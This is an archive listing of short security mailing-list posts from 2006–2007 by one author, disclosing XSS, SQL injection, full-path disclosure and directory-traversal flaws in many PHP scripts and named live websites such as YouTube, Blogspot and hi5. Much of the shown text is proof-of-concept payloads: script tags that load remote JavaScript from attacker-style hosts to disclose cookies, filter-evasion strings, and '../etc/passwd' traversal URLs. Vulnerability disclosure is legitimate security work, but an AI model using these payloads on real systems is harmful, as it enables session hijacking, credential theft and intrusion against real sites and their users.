Nwom topsites v3.0

2007-01-11 Thread lunY
Nwom topsites v3.0 http://www.nwom.net Vulnerable files: Comment input. index.php SQL info released on error: http://www.example.com/index.php?o=' XSS: http://www.example.com/index.php?o= - Luny

Fix & Chips CMS v1.0

2007-01-06 Thread luny
results.php will execute as well. - Luny

Yet Another Link Directory v1.0

2007-01-06 Thread lunY
e.com/yald.php?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E - Luny

OZJournal v1.5 - XSS

2006-08-02 Thread luny
OZJournal v1.5 Homepage: http://ozjournals.awardspace.com/index.php Affected files: search input box index.php viewing archives show comment page XSS vulnerability via search input box: Data isn't properly sanatized before being displayed. For

Orbitmatrix PHP Script v1.0

2006-07-13 Thread luny
Orbitmatrix PHP Script v1.0 Homepage: http://www.orbitcoders.com/ Affected files: index.php Possible SQL injection?: http://www.example.com/index.php?page_name=' And by trying a XSS vuln as shown below on page_name we see the query below which is displayed on screen: http://www.exampl

Photocycle v1.0 - XSS

2006-07-13 Thread luny
Photocycle v1.0 Homepage http://adambrown.info/p/tools/photocycle XSS vuln on phpage var: PoC http://www.example.com/photocycle&phpage=http://www.youfucktard.com/xss.js>

Sport-slo.net Guestbook v1.0

2006-07-07 Thread luny
Advanced Guestbook v1.0 Homepage: http://www.sport-slo.net/ Affected files: guestbook.php --- XSS vuln on guestbook.php: Data isn't sanatized before being submit to guestbook.txt and displayed onscreen. The code: if($_POST['action']) {

TigerTom Scripts

2006-07-05 Thread luny
TigerTom Scripts Homepage: http://www.ttfreeware.co.uk/ Affected files: TTCalc script v1.0 --- Data pased in the "Length of loan, years" and "Length of mortgage, years" input boxes are not sanatized before being generated. For a PoC in the input boxes listed ab

Shopping Cart V0.9

2006-07-05 Thread luny
Shopping Cart V0.9 Homepage: http://glendown.de/shop/ Affected files: index.php editshop.php edititem.php - XSS vuln on editshop.php & edititem.php: Data isn't sanatized before being entered. For a PoC as a shop name or item enter in: alert('

mAds v1.0

2006-07-01 Thread lunY
mAds v1.0 Homepage: http://lowpricescripts.com/product_info.php?products_id=51 Affected files: *Searching --- XSS vuln when searching: Like the hotbot XSS vuln, when searching mAds returns with its results they are generated dynamically on screen, with

Buddy Zone Version 1.0.1 - XSS

2006-07-01 Thread luny
Buddy Zone Version 1.0.1 Homepage: http://www.vastal.com/buddy-zone-social-networking-script.html Affected files: *Sending invitations *Profiles *Blogs *Journals *Posting comments *Posting in the forum *Sending mail *Creating a group view_sub_forum.php view_post.php view_classified

ezWaiter v3.0 - XSS

2006-06-30 Thread luny
ezWaiter v3.0 Homepage: http://www.ezwaiter.com/ Affected files: Placing an order login.php --- XSS vuln when placing an order: User input is not sanatized before being generated. For a PoC in the two boxes labeled "Who is this item for?" and "

PHPClassifieds General

2006-06-28 Thread luny
PHPClassifieds General v.n/a Homepage: http://www.phpclassifieds.info/ Affected files: search.php *Posting classified ads - SQL injection on search.php via rate var: http://www.example.com/search.php?rate=[sql] -

Usenet Script v0.5

2006-06-27 Thread luny
Usenet Script v0.5 Homepage: http://www.metalhead.ws/usenet Description: "Those scripts allow you to mirror a Newsgroup in an SQL database. The development database was Postgresql, but it uses dbx and should therefore be able to work with other database systems, too. Furthermore, a fronten

Winged Gallery v1.0

2006-06-27 Thread luny
Winged Gallery v1.0 Homepage: http://winged.info/index.php?p=gallery XSS vuln on thumb.php: http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg";>''>">">">http://youfucktard.com/xss.js><"<'<'<'<'&size=75&type=2&w=128&h=128">''>">">">

Somechess v1.5 rc1 - XSS

2006-06-21 Thread luny
Somechess v1.5 rc1 Homepage: http://www.astrodogpress.org/chess/ Affected files: *Profile input boxes --- Upon dumping the sql data into the table if you get errors and it wont create the tables & data (like it did to me), then just remove all the " from the sql file

cjGuestbook v1.3 - XSS

2006-06-21 Thread luny
cjGuestbook v1.3 Homepage: http://cmj-php.opanelhosting.com Affected files: * posting in the guestbook XSS vuln with cookie disclosure: cjGuestbook uses bbcode, and since theres a vulnerability in early editions of bbcode we can achieve our XSS example. For a PoC put in as your commen

V3Chat Instant Messenger - XSS

2006-06-19 Thread luny
V3 Chat Instant Messenger http://www.v3chat.com/ Affected files: /mail/index.php /mail/reply.php is_online.php online.php profile.php profileview.php search.php mycontacts.php expire.php * Editing your profile: - input boxes -- Mail Vuln

MPCS v0.2 - XSS

2006-06-19 Thread luny
MPCS v0.2 Homepage: http://tpvgames.co.uk/mpcs Affected files: comment.php XSS vuln with cookie & full path disclosure: Direct html injection doesnt seem to work, however, if you navigate to the code below in your browser, and then post a comment on the same page, our XSS example will

Dragons Kingdom v1.0 - XSS & cookie disclosure

2006-06-19 Thread luny
Dragons Kingdom Script v1.0 Homepage: http://www.dkscript.com/ Affected files: *Sending mail: - Sending in-game mail *Character Profiles: - All input boxes of the profile * Posting & Replying in the forum: - Posting in the forum - Replying in the forum * Form spoofing can occur i

Technorati.com - XSS with cookie disclosure

2006-06-18 Thread luny
Technorati.com Homepage: http://www.technorati.com Affected files: login box Creating a new account input boxes Login box XSS vuln: By escaping quotes and using script tags, we can acomplish our XSS example. For PoC try putting the following code in the login box: ">">">">'>'>'>"><""

43things.com - XSS with cookie disclosure

2006-06-18 Thread luny
43things.com Homepage: http://www.43things.com Affected files: input box "I want to add to my list" posting a comment XSS vuln via input text of the box "I want to" When you add an item thats already on your list. For a PoC we have style

Blogspot.com - XSS with cookie disclosure

2006-06-18 Thread luny
Blogspot.com Homepage: http://www.blogspot.com Affected files: Blog input boxes -- XSS vuln via Display name input box. Blogger doesnt properally sanatize user input before generating it. For example, you can't use illegal characters in your user

Biblenet.net - XSS

2006-06-18 Thread luny
Biblenet.net Homepage: http://www.biblenet.net Affected files: gettinginvolved.html register.php member.php /library/index.html - Biblespace uses vBulletin for most of their site, so most of these vulns are based in the vbulletin site themselves,

B3ta.com - XSS with cookie disclosure

2006-06-18 Thread luny
B3ta.com Homepage: http://www.b3ta.com Affected files: Input boxes of your profile XSS vuln with cookie disclosure via Profile: box. Data isn't correctly sanatized before being generated. We can bypass the filters of the site one way by using img tags and converting our javascript to U

Facetherating.com - XSS & session disclosure

2006-06-18 Thread luny
Facetherating.com Homepage: http://www.facetherating.com Affected files: showprofile.php XSS vuln via showprofile.php: The site does the typical filtering of adding backslashes to ' and " so We'll try something different this time and use a fromCharCode. http://www.facetherating.com/s

Ratemylook.co.uk - XSS with session disclosure

2006-06-17 Thread luny
Ratemylook.co.uk Homepage: http://www.ratemylook.co.uk Affected files: user.php4 top.php4 hot.php4 toponline.php4 user.php4 XSS vuln with cookie disclosure: http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own";>">">'>http://yo

About.com - XSS with cookie disclosure

2006-06-17 Thread luny
About.com Homepage: http://www.about.com Effected files: Search input box fullsearch.htm shortform.htm forum.aspx profile_center.asp posting in the forum --- Search input box xss vuln with cookie disclosure: Works by putting the tags in the input box,

Ratescene.co.uk - XSS with session disclosure

2006-06-17 Thread luny
Ratescene.co.uk Homepage: http://www.ratescene.co.uk Affected files: input boxes of editing your profile Profile input boxes XSS vuln with cookie disclosure: Data isn't sanatized, try entering the code below: Screenshots: http://www.

Windowsitpro.com - XSS with cookie disclosure

2006-06-17 Thread luny
Windowsitpro.com Homepage: http://www.windowsitpro.com Effected files: Search input box Downloading whitepapers Search input box xss vuln with cookie disclosure: We convert our javascript to hex format so we don't recieve the default "Your request cannot be processed as this time" error

Facerave.com - XSS & sessions disclosure

2006-06-17 Thread luny
Facerave.com Homepage: http://www.facerave.com Effected files: * Profile input boxes - Self Description box * Posting a blog entry * Sending a message index.php -- XSS vuln with cookie disclosure via posting a comment: No filte

Hotscripts.com - XSS with cookie disclosure

2006-06-17 Thread luny
Hotscripts.com Homepage: http://www.hotscripts.com Effected files: search input box adding a review Editing your profile sending a author a message. Creating a new listing XSS vuln with cookie disclosure in search input box: For a PoC try p

hi5.com - XSS with cookie disclosure

2006-06-17 Thread luny
hi5.com Homepage: http://www.hi5.com Affected files: Input boxes of editing your profile. XSS Vuln with cookie disclosure: It seems hi5.com allows alot of html tags to be used on thier site but they will filter out words like javascript, applet, and iframe tags (which is to be expected

Cybersocieties.com - XSS & cookie disclosure

2006-06-17 Thread luny
Cybersocieties.com Homepage: http://www.cybersocieties.com Effected files: * Input boxes in profile: - Full name box - Occupation box - MSN box - Yahoo box - AIM Box * Viewing a profile -- XSS vuln via input boxes in profile:

Apnaspace.com - XSS with cookie disclosure

2006-06-17 Thread luny
Apnaspace.com (A myspace type site for arab & indian teens) Homepage: http://www.http://www.apnaspace.com Effected files: * Comment input box: * Posting a blog entry: - Entry title - Entry body * Viewing a profile * Posting a bulletin. * Commenting on a picture * Sending mail to

Dealgates.com - XSS with cookie disclosure

2006-06-17 Thread luny
Dealgates.com Homepage: http://www.dealgates.com Affected files: *Input boxes when registering new account * Search box - XSS vuln with cookie disclosure when registering a new account. To bypass the adding backslashes to ; and ", we use the long U

Housecarers.com - XSS & cookie disclosure

2006-06-17 Thread luny
Housecarers.com Homepage: http://housecarers.com Affected files: * Posting a Housesit: - City/Town box - County/District box - Suburb box - City/Town Area box * Searching for housesitters * Sending messages to house sitters. * Viewing member profiles ---

Bingbox.com - XSS & cookie disclosure

2006-06-16 Thread luny
Bingbox.com Homepage: http://www.bingbox.com Affected files: * Profile input boxes: - City input * Registering * Viewing Birthdays * Adding a friend * Viewing people online --- XSS with cookie disclosure via inviting friends: http://w

Youtube.com - XSS & cookie disclosure

2006-06-16 Thread luny
Youtube.com Homepage: http://www.youtube.com Affected files: * Search box input * Adding a new blog: - Blog name XSS Vuln with cookie disclosure via search box: Data isn't sanatized when using the search box. For PoC input: http://www.youfucktard.com/xss.js> PoC link: http://

Blacksingles.com - XSS & cookie disclosure

2006-06-16 Thread luny
Blacksingles.com Homepage: http://www.blacksingles.com Affected files Profile input boxes Add a friend input box. list.html view.html reply.html compose.html - XSS vuln with cookie disclosure via the Location box. User data isn't sanat

Chatizens.com - XSS with cookie disclosure

2006-06-16 Thread luny
Chatizens.com Also known as Chattown.com Homepage: http://www.chatizens.com Affected files: * Profile input boxes: All input boxes of your profile. * Browsing the forums XSS vuln with cookie disclosure via profile input boxes. To bypass c

Boardhost.com - XSS

2006-06-16 Thread luny
Boardhost.com Description: Free Msgboard hosting service. Homepage: http://www.Boardhost.com Affected files Input boxes of posting a message Searching for a listing board - XSS vuln with cookie disclosure when posting a msg (Tested on

MP3 Search/Archive v1.2 - XSS

2006-06-15 Thread luny
MP3 Search/Archive v1.2 Homepage: http://www.bloodys.com Affected files: Search input box. index.php Data is not properally sanatized before its generated. For PoC try putting the code below in the search box: http://youfucktard.com/xss.js> Screenshots: http://www.youfucktard.co

Emllabs.com - XSS

2006-06-12 Thread luny
Emllabs.com Effected files: articles.php search input box. The search input box doesnt properally filter user input. for PoC try putting in: [SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] XSS Vulnerability: http://previous.emllabs.com/articles.php?navCur=[SCRIPT%20SRC=http://evils

Yourfacesucks.com - XSS & cookie disclosure

2006-06-12 Thread luny
Yourfacesucks.com Homepage: http://www.yourfacesucks.com Effected files: music/video input boxes in editing profile subject box of sending a PM thread.php --- XSS Vuln with cookie disclosure in profile input boxes: No filter evasion needed here. Fo

Meefo.com - XSS with cookie include

2006-06-12 Thread luny
Meefo.com Homepage: http://meefo.com Effected files: reading profiles index.php input boxes onprofiles sending private msgs -- Reading aprofile and with cookie include PoC: Since data isn't properlly filtered (backslashes are added to ' and "), a user can

Vampirefreaks.com - XSS with cookie disclosure

2006-06-12 Thread luny
Vampirefreaks.com Homepage: http://www.vampirefreaks.com Effected files: input boxes of editing your profile posting a journal entry. Commenting XSS Vulnerability: Data isn't properly filtered when editing your profile. One way to bypass the filter is to escape quotes and useclosing b

Virtualtourist.com - XSS with cookie disclosure

2006-06-12 Thread luny
Virtualtourist.com Homepage: http://www.virtualtourist.com Effected files: Input boxes of your profile search destination input box --- XSS vulnerability with cookie disclosure: Under the section of "Tell others a little about yourse

Onlinenode.com - XSS

2006-06-12 Thread luny
Onlinenode.com Homepage: http://www.onlinenode.com Effected files: node_category.php node_article.php webpage.php guestbook.php journal.php pictures.php chatroom.php --- XSS Vuln via node_category.php: One way to archive this is to use black tags with an op

Stargazer.org - XSS with Session output

2006-06-12 Thread luny
Stargazer.org Homepage: http://www.stargazer.org Effected files: login box registration boxes creating a survey --- Login box & registration XSS Vuln: for proof of concept just try adding: '';!--"=&{()}http://youfucktard.com/xss.js>'';!--"=&{()

cescripts.com - XSS

2006-06-12 Thread luny
Cescripts.com Scripts Below are scripts I tested from the site cescripts.com. This site seels to be selling canned scripts, full of errors. Anyways, take a look: Car Classifieds Homepage: http://www.cescripts.com/ effected files: index.php XSS Vulnerabilities PoC: Viewing a car: htt

Wireclub.com - XSS & cookie disclosure

2006-06-12 Thread luny
Wireclub.com Homepage: http://www.wireclub.com Effected files: input boxes of editing a profile XSS Vuln with no filter evasion at all: We notice that when trying to put a url in the Open line about yourself input box, we get the msg "no urls allowed" as well as "the field cannot cont

Nowtalking.com - XSS

2006-06-12 Thread luny
Nowtalking.com Homepage: http://www.nowtalking.com Effected files: input boxes of logging in and searching friends-new.asp gallery.asp friends.asp gb.asp JET DB error due to injection: Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'UserNam

Opengaia.com - XSS Vuln & Session Include

2006-06-12 Thread luny
Opengaia.com Homepage: http://www.opengaia.com Effected files: my_page.php module.php editing your profile the search input box adding a diary/blog Just like in onlinenode.com's vulnerabilities, it seems this site filters data just about the same.

Wanderlist.com - XSS vuln with sessions disclosure

2006-06-12 Thread luny
Wanderlist.com Homepage: http://www.wanderlist.com search.cgi Search box input adding a item to a list Search.cgi XSS vuln with sessions disclosure: By putting a few ending opening tags with quotes beforeand after,we are able create a XSS example: ">">">'http://youfucktard.com/xss.js

Myscrapbook v3.1 - XSS

2006-06-12 Thread luny
Myscrapbook Homepage: http://www.pixytrix.com/myscrapbook/ Effected files: singlepage.php --- Full path error with viewing most files in the txt-db-api dir: Warning: main(API_HOME_DIRutil.php): failed to open stream: No such file or directory in /

5 Star Review - review-script.com - XSS w/ cookie output

2006-06-12 Thread luny
5 Star Review Script Homepage: http://www.review-script.com/ Effected files: index2.php report.php search box editing your profile posting a review. -- index2.php XSS Vuln with cookie disclosure: By ending quotes and using a few closing and opening tag

Diaryland.com - XSS

2006-06-12 Thread luny
Diaryland.com Homepage: http://www.diaryland.com Effected files: input boxes on creating diary entries. posting comments in diary entries XSS Vuln PoC: With no filter evasion at all, we simply put as our entry: [SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT] Screenshots: http://

Mydeardiary.com - XSS

2006-06-12 Thread luny
Mydeardiary.com Homepage: http://www.mydeardiary.com Effected files: search input boxes Adding new diary entries -- We create our XSS example by ending quotes with tags before and after: ">">">'>http://youfucktard.com/xss.js><"<"<"<"<" Screensho


2006-06-10 Thread luny
Tempinbox.com Homepage: http://www.tempinbox.com Effected files: checkmail.pl Description: Tempinbox.com is a free throw away, no sending email service. You enter an account name and you can instantly check email. XSS Vulnerability: It seems the title of emails and subjects are not s

AsianXO.com - XSS with cookie data include

2006-06-10 Thread luny
AsianXO.com Homepage: http://www.asianxo.com/ Effected files: directory.php profiles.php Input boxes of editing profile XSS Vulnerability via dir_id: Directory.php PoC: http://www.axo2.com/directory.php?dir_id=1";>http://evilsite.com/xss.js><" Profiles.

fx-APP Version

2006-06-10 Thread luny
fx-APP Version Homepage: http://fx-app.org/ Effected files: search input box index.cgi input boxes on your profile adding a menu item --- I noticed there was already several BID's on the a script WebAPP: http://search.secur

Ringlink v3.2 - XSS

2006-06-10 Thread luny
Ringlink v3.2 Homepage: http://www.ringlink.org Effected files: next.cgi stats.cgi list.cgi XSS Vulnerability PoC: http://www.example.com/ringlink/next.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')] http://www.example.com/ringlink/stats.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]

ST AdManager Lite v1

2006-06-09 Thread luny
ST AdManager Lite v1 Homepage: http://www.site-trade.com/index.php Effected files: index.php submit.php input form XSS Vulnerabilities: submit.php input forms do not correctly sanatize user input before submitting it to be checked by an admin and then published. This in turn to allow a u

P.A.I.D v2.2

2006-06-09 Thread luny
P.A.I.D v2.2 Homepage: http://www.webexceluk.net Effected files: faq.php input form of logging in. index.php The input forms of logging into My Account do not sanatize user input. For PoC of a XSS attack simply put in: "><" It also seems when logging in, even if your details are incor

TinyMuw v1.0 - XSS

2006-06-09 Thread luny
TinyMuw v1.0 Homepage: http://www.l0j1k.com/tinyMuw/index.php Effected files: quickchat.php input box videoPage.php Input isn't sanatized before being generated in the quickchat.php chatbox. For PoC try putting: in as your comment. Full path disclosure error via URL Injection: http:

MobeSpace v2.0 - XSS

2006-06-09 Thread luny
MobeSpace v2.0 Homepage: http://mobescripts.com/ Effected files: index.php The input forms of: - Profile - Comments - Uploading a file to your locker - Posting in your blog - Creating a caption for your pic - Sending PM's The input boxes of the above do not sanatize user input befo

mole.com.ua Ticket Booking Script - XSS

2006-06-09 Thread luny
Ticket Booking Script Homepage: http://www.mole.com.ua Effected files: input boxes on booking2.php XSS Vulnerabilities: The input boxes on booking2.php do not sanatize userinput before geenrating it and then submitting it to a MySQL db. This can causes XSS examples as well as possible S

mole.com.ua Booking Script

2006-06-09 Thread luny
Booking Script. Homepage: http://www.mole.com.ua PError with full path disclosure and possible buffer overflow?: http://www.example.com/week.php?year=2006&month=06&day=0' Warning: checkdate() expects parameter 2 to be long, string given in /home/httpd/vhosts/domain/subdomains/booking/http

phazizGuestbook v2.0 - XSS

2006-06-09 Thread luny
phazizGuestbook v2.0 Homepage: http://www.devhome.de/#english_version Effected files: input boxes of name, email, url, text. XSS Vulnerability: None of these input boxes sanatize user input before generating it. for PoC put in any of the above boxes.

iFoto v0.20-06/06/06

2006-06-09 Thread luny
iFoto v0.20-06/06/06 Homepage: http://ifoto.ireans.com/ Effected files: XSS Vulnerability: The dir path to show the image is base 64 encoded, so to attempt this XSS example we encode our codein base64. The code we'll be using is javascript in an iframe tag. [IFRAME SRC="javascript:aler

okscripts.com - XSS Vulns

2006-06-09 Thread luny
OkMall v1.0 Homepage: http://www.okscripts.com/ Effected files: search.php XSS Vulnerabilities: The search inputbox doesn’t properally filter using input before generating it. Backslashes areadded but we can easily evade this. ForPoC try putting a [imgsrc=lol.jpg]in the search box.

Ez Ringtone Manager from scriptez.net - XSS

2006-06-08 Thread luny
Ez Ringtone Manager Homepage: http://www.scriptsez.net Effected files: player.php search input box. XSS Vulnerabilities: http://example.com/ringtones/player.php?action=preview&id=http://evilsite.com/xss.js>&cat=LG%20Mobiles The search box doesnt properlly filter user input. Tags like

E-Dating System from scriptsez.net - XSS

2006-06-08 Thread luny
E-Dating System Homepage: http://www.scriptsez.net/ Effected files: Input boxes. cindex.php Description: A Professional dating system that uses flatfiles instead of MySQL. XSS Vulnerabilities PoC: The input boxes of sending a message, and editing your profile do not properally filt

Easy Ad-Manager

2006-06-08 Thread luny
Easy Ad-Manager v. (unknown, not listed on homepage) Homepage: http://www.scriptsez.net Effected files: details.php XSS Vulnerability with full path disclosure: http://www.example.com/eam/details.php?do=load&mbid=/http://evilsite.com/xss.js> Warning: fopen(stats//This is remote text via

Chemical Directory - XSS

2006-06-08 Thread luny
Chemical Directory v.unknown (doesnt say on website) Homepage: http://www.scriptsez.net/ Effected files: dictionary.php XSS Vulnerability via keyword variable: http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT SRC=http://evilsite.com/xss.js][/SCRIPT]

Babykatmedia.com scripts - vSCAL & vREAL - XSS Vulns

2006-06-08 Thread luny
vSCAL and vREAL v1.0 Homepage: http://www.babykatiemedia.com/ Effected files: index.php myslideshow.php XSS Vulnerability via lid variable: http://www.example.com/vscal/index.php?page=showlisting&lid= XSS Vulnerability via myslideshow.php http://www.example.com/vscal/myslideshow.php?d

PBL Guestbook v1.31 - XSS

2006-06-08 Thread luny
PBLGuestbook v1.31 Homepage: http://www.pixelatedbylev.com/ Effected files: input boxes of the guestbook. XSS Vulnerabilities PoC: I noticed that common tags like

GANTTy v1.0.3

2006-06-06 Thread luny
GANTTy v1.0.3 Homepage: http://www.gantty.com Effected files: index.php XSS Vulnerabilities PoC: XSS Vulnerability: http://www.example.com/index.php?action=login&message=+email&lang= Full path disclosure error: http://www.example.com/index.php?action=authenticate&lang=' Error: FILE

ParticleSoft Wiki v1.0.2

2006-06-06 Thread luny
ParticleSoft Wiki v1.0.2 Effected files: input boxes on editing pages: XSS Proof of concept: We notice br tags are allowed, so by using a STYLE attribute using a comment to break up expression we can create a XSS vuln: Put the following in when editing a page: Thanks to Rsnake & Rom

ParticleSoft Whois v1.0.3

2006-06-06 Thread luny
ParticleSoft Whois v1.0.3 Homepage: http://www.particlesoft.net/particlewhois/ XSS Proof of concept viaurl injection: http://whois.particlesoft.net/index.php?do=runcheck&target=";>http://evilsite.com/scriptlet.html <<"&ext=all XSS Via input box: ">http://evilsite.com/scriptlet.html <<"

Partial Links v1.2.2

2006-06-06 Thread luny
Partial Links v1.2.2 Homepage: http://www.particlesoft.net/particlelinks/ Effected files: index.php page_footer.php admin.php Exploits & Vulnerabilities: Possible directory traversal?: http://www.example.com/Other_Sites/X_%2526_Y/../../../../../etc/passwd/ SQL Injection: http://www.

Particle Gallery v1.0.0

2006-06-06 Thread luny
Homepage: http://www.particlesoft.net/particlegallery/ Effected files: viewimage.php viewalbum.php SQL Injection: http://www.example.com/viewimage.php?imageid=' XSS Vulnerability proof of concept: http://www.example.com/viewimage.php?imageid=http://evilsite.com/scriptlet.html> Possible

Kmita FAQ v1.0

2006-06-05 Thread luny
Kmita FAQ v1.0 Homepage: http://www.kmita-faq.com Effected files: search.php index.php Search.php does not sanatize user input before dynamically genrating it. Proof of concept: http://www.example.com/search.php?q=http://evilsite.com/xss.js> SQL Injection proof of concept: http://www

LabWiki v1.0

2006-06-05 Thread luny
LabWiki 1.0 Homepage: http://www.bioinformatics.org/phplabware/labwiki/index.php Effected files: search.php The search input box does not sanatize user input before dynamically genrating it. XSS Proof of concept: ">http://evilsite.com/xss.js><"

MyTrueHood.com - XSS

2006-06-02 Thread luny
MyTrueHood.com Homepage: http://www.mytruehood.com Effected files: Input boxes of submitting a comment and signing a guestbook XSS proof of concept: put in the signing aguestbook or leaving a comment in a blog box.

PHP ManualMaker v1.0

2006-06-02 Thread luny
PHP ManualMaker v1.0 Homepage: http://deltascripts.com/phpmanualmaker/ Effected files: index.php Search boxes Comment boxes XSS proof of concept: Input in search or comment box: ">">">'><""><'<" XSS via URL injection of id: http://www.example.com/manualmaker/index.php?print=1&id=htt

Weblog Oggi v1.0

2006-06-02 Thread luny
Weblog Oggi v1.0 Homepage: http://www.hotwebscripts.com/index.php User input isn't sanatized before being dynamically generated. For proof of concept just put in as a comment

TAL RateMyPic v1.0

2006-06-01 Thread luny
/somecommand.php?somevariables=maliciouscode> -- Luny - http://www.youfucktard.com

QontentOneCMS v1.0

2006-05-31 Thread luny
QontentOneCMS v1.0 homepage: http://www.qontentone.com/ Effected files: search.php input forms XSS Proof of concept: http://www.example.com/search.php?search_phrase=";>http://www.evilsite.com/xss.js><"&search=Search

Morris Guestbook v1

2006-05-26 Thread luny
Homepage: http://www.tuttophp.altervista.org/morrisguest-ing.htm Description: Morris Guestbook is a text-based guestbook with the following features: Data storing on text file, paging of messages on screen, words crypting, counting of inserted messages, blockage of messages with both html t

Smile Guestbook v1

2006-05-26 Thread luny
Homepage: http://www.tuttophp.altervista.org/smileguest-ing.htm Description: Smile Guestbook is a cool text-based guestbook with smilies inserting and other features below Effected files: view.php An XSS attack is possible due to no filtering of pagina variable: http://www.example.com/p

Pretty Guestbook v1

2006-05-26 Thread luny
Homepage: http://www.tuttophp.altervista.org/main.php Description: Text-based guestbook with the following features: - Data storing on text file - Paging of messages on screen - Blockage of messages with words too long into - Blockage of messages with both html tags(<>) - Validity-checking of

MyYearBook.com - XSS

2006-05-26 Thread luny
MyYearBook.com - Personal community site like myspace.com Effected files: Input forms of: editing profile posting a blog search boxes posting a bulletin posting a comment --- XSS Vulnerabilities proof of concept: When editing your profile, it seems

Vacation Retal Script v1.0

2006-05-26 Thread luny
> -- Luny - http://www.youfucktard.com

Super Link Exchange Script v1.0

2006-05-26 Thread luny
searchbox: -- Directory Traversal: http://www.example.com/make_thumbnail.php?imgpath=../../../../etc/passwd/ ------ Luny - http://www.youfucktard.com

PHPSimple Choose v0.3

2006-05-26 Thread luny
PHPSimple Choose v0.3 Homepage: http://phpsimplechoose.sourceforge.net Description: Do you need to add some fun to your site? Look no further. With PHPSimpleChoose you can let your users input terms and have one randomly choosen. Every bit of text is changeable, and we are working on al

iBoutique.MALL - Directory Traversal

2006-05-26 Thread luny
iBoutique.MALL Homepage: http://www.netartmedia.net/mall/ Description: Based on iBoutique 4.0, iBoutique.MALL is a powerful multi user mall software solution. It makes possible for the new vendors to signup and create their own customized online stores with ease. Effected files: index.ph

iFlance v1.1

2006-05-25 Thread luny
iFlance Homepage: http://www.ifusionservices.co.uk/ Description: iFlance is a powerful freelance script, that allows anyone to run their very own own professional, profitable Freelancing website Effected files: acc_verify.php project.php all input boxes XSS BY URL Injection of acc_v

Pre News Manager v1.0

2006-05-25 Thread luny
Pre News Manager v1.0 Homepage: http://www.preprojects.com/news.asp Description: Effected files: index.php news_detail.php email_story.php thankyou.php printable_view.php tella_friend.php send_comments.php Exploits & Vulns: XSS Vulnerabilities: By inserting alert("XSS")"> onto

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